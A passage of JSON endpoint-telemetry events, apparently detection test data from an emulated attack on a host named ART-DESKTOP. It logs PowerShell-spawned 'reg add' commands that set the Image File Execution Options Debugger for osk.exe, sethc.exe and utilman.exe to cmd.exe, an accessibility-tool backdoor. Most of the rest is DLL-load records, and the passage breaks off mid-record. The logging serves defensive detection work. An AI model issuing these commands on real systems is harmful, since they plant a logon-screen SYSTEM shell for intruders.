"cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "event_type": "process", - "pid": 2012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571822140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3088, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571822270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571822300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "event_type": "process", - "pid": 3088, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571822300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C2145101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\osk.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4816, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571824540000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\osk.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4564, - "ppid": 4816, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571824630000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-001062235101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824490000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "registry", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe", - "registry_value": "osk.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "registry", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "process", - "pid": 4564, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001055245101}" - }, - { - "event_type": "process", - "pid": 4816, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001062235101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6884, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571824790000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "process", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571824800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\sethc.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5648, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571825390000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\sethc.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1284, - "ppid": 5648, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571825470016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "registry", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", - "registry_value": "sethc.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "registry", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "process", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "process", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5036, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571825639984, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "process", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\utilman.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7448, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571826260000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\utilman.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3444, - "ppid": 7448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571826340000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": 